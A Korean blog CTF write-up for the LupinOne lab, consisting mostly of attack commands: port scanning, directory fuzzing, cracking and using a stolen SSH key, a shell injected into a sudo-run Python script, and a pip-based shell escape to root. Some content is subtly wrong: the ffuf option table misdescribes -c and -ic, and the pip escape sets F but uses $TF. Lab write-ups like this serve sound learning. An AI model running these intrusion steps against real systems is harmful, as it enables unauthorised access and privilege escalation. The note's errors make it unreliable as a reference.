CTF

CTF) LupinOne

이야기prog 2025. 8. 26. 16:20
반응형
nmap -sC -sV -p- 192.168.16.2

dirb http://192.168.16.2

gobuster dir -u http://192.168.16.2 -w /usr/share/wordlists/dirbuster/directory-list-1.0.txt

ffuf -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://192.168.16.2/~FUZZ -t 200 -c -fs 0

ffuf -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://192.168.16.2/~secret/.FUZZ -t 200 -c -fc 403 -ic -e .txt

 

 

✅ ffuf 옵션 요약

옵션이름설명예시
-u URL 공격 대상 URL 설정, FUZZ 위치 지정 -u http://target.com/FUZZ
-w Wordlist 사용할 단어 리스트 경로 지정 -w wordlist.txt
-e Extensions 단어에 자동으로 확장자 붙이기 -e .php,.html,.bak
→ login.php, login.html, ...
-c Cookie 요청에 쿠키 추가 (로그인 세션 등) -c "sessionid=abc123"
-fc Filter Status Code 특정 HTTP 응답 코드를 제외하고 결과 출력 -fc 404,403
-fs Filter Size 특정 응답 **크기(Byte)**를 제외 -fs 0 → 빈 응답 제거
-ic Ignore Case 대소문자 구분 없이 Fuzzing -ic → admin, Admin, ADMIN 등 모두 시도

 

vi /home/kali/victim_id_rsa

#복호화한 ssh인증서 부분 복사 붙여넣기

chmod 600 /home/kali/victim_id_rsa

ssh2john /home/kali/victim_id_rsa > hash_pass
P@55w0rd!

ssh -i /home/kali/victim_id_rsa id@ip
#비밀번호 입력


sudo -l

cat /home/arsene/heist.py

#linpeas.sh 다운하면 시스템에 웬만한 취약점과 공격방법을 알려주는 스크립트
chmod u+x linpeas.sh

 

os.system("/bin/bash") 삽입

 

sudo -u arsene /home/arsene/heist.py

F=$(mktemp -d)
echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py
sudo pip install $TF

cd ~
cat root.flag

 

반응형